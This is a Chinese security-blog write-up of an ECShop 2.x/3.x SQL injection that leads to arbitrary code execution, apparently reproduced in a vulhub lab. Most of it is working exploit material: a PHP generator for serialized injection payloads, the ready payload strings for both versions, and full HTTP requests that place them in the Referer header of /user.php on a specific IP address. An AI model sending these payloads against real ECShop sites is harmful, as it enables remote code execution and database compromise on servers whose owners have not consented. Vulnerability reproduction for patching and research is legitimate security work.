ECShop 2.x/3.x SQL注入/任意代码执行漏洞

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。

其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。

生成2.x和3.x的POC

<?php

$shell = bin2hex("{$asd'];phpinfot();//}xxx");

$id = "-1' UNION/*";

$arr = [

    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),

    "id" => $id

];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';

$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: n";

echo "{$hash2}ads|{$s}{$hash2}";

echo "nnPOC for ECShop 3.x: n";

echo "{$hash3}ads|{$s}{$hash3}";

2.x poc

554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

3.x poc

45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

2.x 生成的POC,放在Referer里发送:

GET /user.php HTTP/1.1

Host: 188.40.189.134:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

Cookie: has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; ECS[visit_times]=1

Upgrade-Insecure-Requests: 1

53443-46xpoi27z8c.png
3.x生成poc,放在Referer里发送:

GET /user.php HTTP/1.1

Host: 188.40.189.134:8081

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

Cookie: has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; ECS[visit_times]=2

Upgrade-Insecure-Requests: 1

97279-hsaihncps0o.png

本文经授权后发布,本文观点不代表立场,转载请联系原作者。
9大转变释放新信号!关基保护再迎里程碑:《网络安全审查办法》解读
« 上一篇 05-18
电源变扬声器!地球上最安全的气隙系统不再安全
下一篇 » 05-18

相关推荐

红队防猝死手册

文章来源:https://github.com/zhutougg/RedteamStandard一切为了不丢分工作环境工作时全部操作均在虚拟机中完成虚拟机...

渗透某勒索服务器

这是 酒仙桥六号部队 的第 74 篇文章。全文共计1300个字,预计阅读时长5分钟。文章来源:六号刃部 - 酒仙桥六号部队 事情经过和我一起合租的室友喜欢...

Android渗透工具集合

Android安全测试更多地被安全行业用来测试Android应用程序中的漏洞。下面将列举全面的Android渗透测试工具和资源列表,其涵盖了在Andro...